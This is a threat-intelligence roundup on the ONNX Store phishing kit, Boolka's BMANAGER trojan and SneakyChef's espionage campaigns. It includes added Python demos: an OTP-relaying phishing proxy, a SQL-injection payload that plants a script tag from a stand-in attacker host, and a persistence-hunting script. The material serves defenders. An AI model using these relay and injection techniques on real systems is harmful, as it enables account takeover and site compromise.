CTI Roundup: Busy Days for Threat Actors: ONNX Store, Boolka, and SneakyChef
ONNX Store targets the financial industry, Boolka delivers the BMANAGER trojan via SQLi attacks, and SneakyChef deploys SpiceRAT and SugarGh0st
In this week’s roundup, CTI looks at a phishing-as-a-service (PhaaS) platform called ONNX Store that is now targeting Microsoft 365 accounts in the financial industry. Next, CTI provides an update on a threat actor tracked as Boolka, which compromises websites to deliver a trojan called BMANAGER. Finally, CTI wraps up with an overview of SneakyChef, a previously undocumented threat actor tied to a cyberespionage campaign that targeted government entities.
1. ONNX Store targets the finance industry
A phishing-as-a-service (PhaaS) platform known as ONNX Store is targeting Microsoft 365 accounts. The current attacks target employees at financial firms and use QR codes embedded in PDF attachments.
ONNX Store increases its chances of success with a 2FA bypass: the phishing page intercepts the victim’s requests, including the one-time code the victim enters, so the attacker can complete the login rather than being stopped at the second factor. EclecticIQ assesses that the threat actor behind ONNX Store is the same actor behind the Caffeine kit and that ONNX Store may be a rebranding of that platform. In 2023, the creator of the Caffeine kit announced a rebrand and noted that it had moved to “ONNX STORE.” The rebrand focuses on better OPSEC for operators: Caffeine had relied on a single shared web server to manage all campaigns.
ONNX lets operators control their campaigns through Telegram bots and provides an additional support channel. EclecticIQ observed bots that receive stolen 2FA codes, receive Microsoft Office 365 credentials, give operators control of a webmail server for sending phishing emails, and let operators make payments, track orders, generate phishing emails and social-engineering lures, and obtain bulletproof hosting.
According to EclecticIQ, ONNX Store places its phishing domains behind Cloudflare to “delay the takedown process of phishing domains.”
ONNX Store and QR phishing
Like many other phishing services today, ONNX Store now uses QR codes to execute attacks.
The service distributes PDF documents that contain a QR code. The PDFs are typically themed around salary updates, employee handbooks, and other HR-related topics, which gives the recipient a reason to scan the code with a personal phone, outside the protections of the corporate network.
Scanning the QR code sends the victim to a phishing site controlled by the threat actor. The page is built to steal both login credentials and 2FA codes.
ONNX Store and JavaScript
The phishing pages use encrypted JavaScript that decrypts itself when the page loads. The code that steals the 2FA tokens a victim enters therefore never appears in the page source, which hides it from anti-phishing scanners that inspect static content rather than executing the page.
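The 2FA bypass described above is easier to reason about with a working model. The following is an added example, not ONNX Store code or EclecticIQ’s analysis: a mock reverse-proxy phishing page relays a victim’s password and one-time code to a mock login service and ends up holding a live session, while the same relay fails when the victim signs in with an origin-bound WebAuthn assertion. The domains, the shared secret, and the public-key comparison standing in for signature verification are all constructed for the demo; only the TOTP routine is the real RFC 6238 algorithm.

```python
"""Added example, not ONNX Store code: a mock reverse-proxy phishing page that
relays a victim's credentials and one-time code to the real login service, and
why the same relay fails against an origin-bound WebAuthn assertion.
Domains, secrets and the signature check are constructed stand-ins."""
import hashlib
import hmac
import json
import struct


def totp(secret: bytes, at: int, step: int = 30, digits: int = 6) -> str:
    """RFC 6238 TOTP (HMAC-SHA1), i.e. the code an authenticator app shows."""
    counter = struct.pack(">Q", at // step)
    mac = hmac.new(secret, counter, hashlib.sha1).digest()
    offset = mac[-1] & 0x0F
    code = struct.unpack(">I", mac[offset:offset + 4])[0] & 0x7FFFFFFF
    return str(code % 10 ** digits).zfill(digits)


class IdentityProvider:
    """Stand-in for the real Microsoft 365 login endpoint (hypothetical origin)."""
    ORIGIN = "https://login.example-tenant.invalid"

    def __init__(self, user: str, password: str, totp_secret: bytes, fido_pubkey: str):
        self.users = {user: (password, totp_secret, fido_pubkey)}
        self.sessions = {}

    def login_totp(self, user, password, code, now):
        pw, secret, _ = self.users[user]
        if pw == password and hmac.compare_digest(code, totp(secret, now)):
            return self._issue(user)
        return None

    def login_webauthn(self, user, assertion):
        # A real relying party verifies a signature over challenge || clientDataJSON
        # with the registered public key; here the key string stands in for that.
        _, _, pubkey = self.users[user]
        client_data = json.loads(assertion["clientDataJSON"])
        if client_data["origin"] != self.ORIGIN:      # the check a relay cannot satisfy
            return None
        return self._issue(user) if assertion["pubkey"] == pubkey else None

    def _issue(self, user):
        token = hashlib.sha256(f"{user}:{len(self.sessions)}".encode()).hexdigest()[:16]
        self.sessions[token] = user
        return token


class AitmProxy:
    """The phishing page: mimics the IdP and forwards whatever the victim submits."""
    ORIGIN = "https://login.example-tenant-secure.invalid"  # attacker-controlled, constructed

    def __init__(self, upstream: IdentityProvider):
        self.upstream = upstream
        self.captured = []          # what the operator's Telegram bot would receive

    def relay_totp(self, user, password, code, now):
        self.captured.append(("creds+otp", user, password, code))
        token = self.upstream.login_totp(user, password, code, now)
        if token:
            self.captured.append(("session", token))   # the real prize: a live session
        return token

    def relay_webauthn(self, user, assertion):
        # The proxy cannot rewrite the origin: it is inside the data the authenticator signed.
        return self.upstream.login_webauthn(user, assertion)


def browser_webauthn(page_origin: str, pubkey: str, challenge: str) -> dict:
    """What the victim's browser builds: the origin is the page actually visited."""
    return {"clientDataJSON": json.dumps({"origin": page_origin, "challenge": challenge}),
            "pubkey": pubkey}


def run_demo():
    secret = b"constructed-shared-secret"
    idp = IdentityProvider("alice", "correct horse", secret, "fido-pubkey-alice")
    proxy = AitmProxy(idp)
    now = 1_700_000_000
    # 1. Victim types password and the 6-digit code into the look-alike page.
    relayed_otp = proxy.relay_totp("alice", "correct horse", totp(secret, now), now)
    # 2. Same victim, same phishing page, but signing in with a FIDO2 authenticator.
    assertion = browser_webauthn(AitmProxy.ORIGIN, "fido-pubkey-alice", "nonce-1")
    relayed_fido = proxy.relay_webauthn("alice", assertion)
    return relayed_otp is not None, relayed_fido is None, len(proxy.captured)


if __name__ == "__main__":
    print(run_demo())  # (True, True, 2)
```

The point for defenders: nothing about the TOTP relay is detectable by the second factor itself, because the code is valid and arrives at the real service within its time window. The origin in `clientDataJSON` is what breaks the relay, which is why phishing-resistant MFA, not more OTP prompts, is the control that counters kits of this kind.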
Analyst comments from Tanium’s Cyber Threat Intelligence team
ONNX Store shares most of its features and capabilities with other phishing kits on the market, so whether it will really take off is open to debate.
Right now, researchers have only observed the kit used against financial firms. That could change given the creators’ increased focus on improving OPSEC for their users. Their adoption of QR codes also shows an interest in keeping pace with the broader threat landscape.
2. Boolka deploys the BMANAGER trojan via SQLi attacks
A threat actor tracked as Boolka is compromising vulnerable websites to deliver a trojan called BMANAGER.
According to Group-IB, the actor has been conducting opportunistic SQL injection attacks across multiple countries since at least 2022, collecting and exfiltrating user inputs from the compromised sites. The newer campaign redirects visitors to a landing page that prompts them to download and install a browser extension, which is actually the BMANAGER trojan.
Web attacks involving Boolka
Boolka has been infecting websites with malicious JavaScript since 2022. When a user visits one of the infected sites, the script downloads and executes in the browser. It first sends a request to Boolka’s server to report that it ran, then collects the inputs the user enters into the site and exfiltrates them.
An updated version of the script with a few modifications was recently discovered. It now checks for a div element with the ID “hookwork” and creates one if it is not present, and it contains additional checks that exclude specific properties from being sent to the server.
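Group-IB ties the injected script to Boolka’s SQL injection activity. The example below is added here and is not Boolka’s code or Group-IB’s tooling; it assumes the injected script is planted in stored site content through an injectable UPDATE, which is one plausible path and is labelled as such. It shows the injectable query beside its parameterized form, a single request that appends an off-origin script tag to every stored page, and the response check a site owner can run to catch the planted tag. The table, slugs, and attacker host are constructed.

```python
"""Added example, not Boolka's or Group-IB's code: an injectable UPDATE lets one
request append a script tag to every stored page, the parameterized form stops
it, and a response check spots the planted off-origin script. The table,
slugs and attacker host are constructed."""
import re
import sqlite3
from urllib.parse import urlparse

ATTACKER_SCRIPT = '<script src="https://cdn.attacker.invalid/h.js"></script>'  # constructed
SCRIPT_SRC = re.compile(r"<script[^>]+src=[\"']([^\"']+)[\"']", re.I)


def setup_db() -> sqlite3.Connection:
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE pages (id INTEGER PRIMARY KEY, slug TEXT, body TEXT)")
    db.executemany("INSERT INTO pages (slug, body) VALUES (?, ?)",
                   [("home", "<h1>Welcome</h1>"), ("contact", "<form>...</form>")])
    db.commit()
    return db


def update_body_vulnerable(db, slug: str, new_body: str) -> int:
    """The bug: request parameters are formatted straight into the statement."""
    sql = f"UPDATE pages SET body = '{new_body}' WHERE slug = '{slug}'"
    cur = db.execute(sql)
    db.commit()
    return cur.rowcount


def update_body_safe(db, slug: str, new_body: str) -> int:
    """The fix: bound parameters are data, never SQL, so quotes cannot break out."""
    cur = db.execute("UPDATE pages SET body = ? WHERE slug = ?", (new_body, slug))
    db.commit()
    return cur.rowcount


def foreign_scripts(html: str, allowed_hosts: set) -> list:
    """Script sources served from hosts outside the allow-list: what a content
    integrity check or a crawl of your own site should alert on."""
    hits = []
    for src in SCRIPT_SRC.findall(html):
        host = urlparse(src).netloc.lower()
        if host and host not in allowed_hosts:
            hits.append(src)
    return hits


def run_demo():
    # Attacker-supplied parameters: new_body closes the quoted literal and
    # concatenates the original body with the script tag; slug neutralises the
    # WHERE clause so every row is hit by a single request.
    evil_body = "' || body || '" + ATTACKER_SCRIPT
    evil_slug = "about' OR 1=1 --"

    db = setup_db()
    rows_hit = update_body_vulnerable(db, evil_slug, evil_body)
    bodies = [row[0] for row in db.execute("SELECT body FROM pages")]
    flagged = {b for b in bodies if foreign_scripts(b, {"www.example.invalid"})}

    db_safe = setup_db()
    changed = update_body_safe(db_safe, evil_slug, evil_body)  # no such slug: 0 rows
    clean = [row[0] for row in db_safe.execute("SELECT body FROM pages")]
    return rows_hit, len(flagged), changed, any(ATTACKER_SCRIPT in b for b in clean)


if __name__ == "__main__":
    print(run_demo())  # (2, 2, 0, False)
```

The `foreign_scripts` check is deliberately simple; an inline script that builds the tag at runtime would evade it, which is why the more robust control is a Content Security Policy with an explicit `script-src` allow-list enforced by the browser rather than a scan of stored HTML.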
Malware delivery
A landing page discovered in January is now believed to have been a test run of Boolka’s malware delivery platform. The platform is built on the open-source tool BeEF. Boolka registered three domains for landing pages, but only one has been observed in use.
In March 2024, Group-IB observed Boolka’s delivery platform in the wild for the first time. The platform is used to distribute the BMANAGER downloader.
Malware
Group-IB discovered multiple malware samples, each of which begins with the BMANAGER downloader (the dropper). The family also includes BMANAGER itself, BMREADER for data exfiltration, BMLOG for keylogging, BMHOOK for recording which running application has keyboard focus, and BMBACKUP for file theft.
BMANAGER downloader
The downloader retrieves and executes the BMANAGER malware, fetching it with an HTTP GET request from a URL hard-coded in the dropper. It achieves persistence through a Windows scheduled task that starts the malware when a user logs on.
BMANAGER
BMANAGER itself downloads files from a hard-coded C2. It can create and delete startup tasks and run other executables. On first start it registers with the C2 using a randomly generated GUID, which it stores in a SQL database, and then requests from the C2 a list of applications it should target.
The malware then obtains further executables from the C2: BMREADER, BMLOG, BMHOOK, and BMBACKUP. Most of the samples use a local SQL database that is hard-coded into them.
Analyst comments from Tanium’s Cyber Threat Intelligence team
Boolka has significantly evolved its tactics, techniques, and procedures (TTPs) since its first attacks, moving from opportunistic SQL injection alone to building an entire malware delivery platform and a family of custom malware.
This actor is proving to be a formidable threat, so it is surprising that there has not been more public reporting on its activity. On a related note, using SQL injection to steal sensitive data appears to be making a comeback.
3. SneakyChef deploys SpiceRAT and SugarGh0st
SneakyChef is now linked to a cyberespionage campaign targeting government entities. The previously undocumented threat actor uses scanned documents from government agencies as lures and has been observed deploying SugarGh0st and SpiceRAT in its campaigns.
About SneakyChef
Cisco Talos originally identified a campaign using the SugarGh0st RAT in mid-2023. Since then, Talos has continued to observe campaigns using the same malware, which led it to create a new actor profile dubbed SneakyChef. The actor is assessed to be Chinese-speaking based on its language preferences and its use of Gh0st RAT, which is popular among Chinese actors. It originally targeted users in Uzbekistan and South Korea and has since broadened its targeting to multiple countries across EMEA and Asia.
SneakyChef’s lures
SneakyChef is using lures involving scanned documents of government agencies. Cisco Talos notes that these documents do not appear to be publicly available.
For campaigns targeting Southern African countries, the documents impersonated the Ministry of Foreign Affairs of Angola. For campaigns targeting Central Asian countries, the documents impersonated the Ministry of Foreign Affairs of Turkmenistan or Kazakhstan.
Lures targeting Middle Eastern countries used documents posing as a circular about an official holiday. Beyond government-themed lures, Cisco Talos also observed a decoy document that was an application to register for a conference and another that was a research paper abstract from an international conference, along with further lures related to conference invitations and details.
Old and new C2 domains
As noted, Cisco Talos first observed activity from this actor in 2023, before it had been attributed. The actor continues to use a C2 domain reported several months ago, which was seen in use until mid-May 2024. Talos also observed a new C2 domain used by the SugarGh0st malware between March and April 2024.
SneakyChef’s infection chain
In its newest campaign, SneakyChef uses a third infection chain that abuses a self-extracting (SFX) RAR archive for initial access. When the victim runs the executable, the SFX script drops a decoy document, a DLL loader, the encrypted SugarGh0st payload, and a malicious VB script.
The VB script runs first and establishes persistence through a registry key that executes at logon. When the user logs in, a command runs the loader DLL, update.dll. The loader reads the encrypted SugarGh0st payload, authz.lib, decrypts it, and injects it into a process.
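Both the BMANAGER downloader (a logon-triggered scheduled task) and SneakyChef’s VB script (a Run-key entry) rely on the same two classic logon-persistence mechanisms, so one hunting script covers both. The following is an added example, not Group-IB’s or Cisco Talos’s tooling: it parses a `reg query` style dump of the Run key and exported scheduled task XML, keeps only logon-triggered entries, and flags those that launch from user-writable paths or through a script or DLL host binary. The dump and task XML are constructed, the task names and file paths are invented, and the `rundll32` command line for update.dll is an assumption since the page does not state how the loader is invoked.

```python
"""Added hunting example, not Group-IB's or Cisco Talos's tooling: flag logon
persistence that launches from user-writable paths, as BMANAGER's logon task
and SneakyChef's Run-key VBScript do. All sample data below is constructed."""
import re
import xml.etree.ElementTree as ET

TASK_NS = {"t": "http://schemas.microsoft.com/windows/2004/02/mit/task"}
USER_WRITABLE = re.compile(
    r"(?i)(%(appdata|localappdata|temp|tmp|userprofile|public)%"
    r"|c:\\users\\|c:\\programdata\\|c:\\windows\\temp\\)")
LOLBINS = re.compile(r"(?i)\b(rundll32|regsvr32|wscript|cscript|mshta|powershell)(\.exe)?\b")

# Constructed "reg query HKCU\...\Run" output. The rundll32 line is an assumption
# about how update.dll is launched; the page only says a command runs the DLL.
RUN_KEY_DUMP = r"""
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run
    OneDrive    REG_SZ    "C:\Program Files\Microsoft OneDrive\OneDrive.exe" /background
    authz       REG_SZ    wscript.exe //B "C:\Users\victim\AppData\Roaming\authz.vbs"
    update      REG_SZ    rundll32.exe "C:\Users\victim\AppData\Local\update.dll",Start
"""

# Constructed scheduled-task XML (declaration omitted; real exports are UTF-16).
TASKS = {
    "Updater": r"""<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">
  <Triggers><LogonTrigger><Enabled>true</Enabled></LogonTrigger></Triggers>
  <Actions><Exec><Command>C:\Program Files\Vendor\updater.exe</Command></Exec></Actions>
</Task>""",
    "bmanager": r"""<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">
  <Triggers><LogonTrigger><Enabled>true</Enabled></LogonTrigger></Triggers>
  <Actions><Exec>
    <Command>C:\Users\victim\AppData\Roaming\bmanager\bmanager.exe</Command>
    <Arguments>--silent</Arguments>
  </Exec></Actions>
</Task>""",
}


def parse_run_values(dump: str) -> list:
    """(value name, command line) pairs from reg-query style text."""
    out = []
    for line in dump.splitlines():
        parts = re.split(r"\s{2,}", line.strip(), maxsplit=2)
        if len(parts) == 3 and parts[1].startswith("REG_"):
            out.append((parts[0], parts[2]))
    return out


def parse_logon_task(xml_text: str, name: str):
    """(task name, command line) if the task fires at logon, else None."""
    root = ET.fromstring(xml_text)
    if root.find("t:Triggers/t:LogonTrigger", TASK_NS) is None:
        return None
    exe = root.find("t:Actions/t:Exec", TASK_NS)
    if exe is None:
        return None
    cmd = exe.findtext("t:Command", default="", namespaces=TASK_NS)
    args = exe.findtext("t:Arguments", default="", namespaces=TASK_NS)
    return (name, f"{cmd} {args}".strip())


def assess(name: str, cmd: str) -> tuple:
    """Attach the reasons an entry deserves a look; empty reasons mean benign."""
    reasons = []
    if USER_WRITABLE.search(cmd):
        reasons.append("launches from user-writable path")
    if LOLBINS.search(cmd):
        reasons.append("uses script/DLL host binary")
    return (name, cmd, reasons)


def hunt() -> list:
    """Logon-persistence entries with at least one reason, in discovery order."""
    findings = [assess(f"Run\\{n}", c) for n, c in parse_run_values(RUN_KEY_DUMP)]
    for tname, xml_text in TASKS.items():
        task = parse_logon_task(xml_text, tname)
        if task:
            findings.append(assess(f"Task\\{task[0]}", task[1]))
    return [f for f in findings if f[2]]


if __name__ == "__main__":
    for name, cmd, reasons in hunt():
        print(f"{name}: {cmd}\n    {', '.join(reasons)}")
```

On a live host the same logic runs over `reg query HKCU\Software\Microsoft\Windows\CurrentVersion\Run` (and the HKLM and RunOnce variants) and over `schtasks /query /xml` output; a signed binary in Program Files with a logon trigger, like the constructed Updater task, drops out, while anything starting from a profile directory or via wscript/rundll32 is what these two campaigns would look like.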
Analyst comments from Tanium’s Cyber Threat Intelligence team
This reporting illustrates how difficult attribution can be. In this case, it took nearly a full year before researchers could tie a set of activities to a single actor and build a profile. That is especially notable for Chinese threat actors, whose TTPs overlap so heavily that distinguishing one group from another is often hard.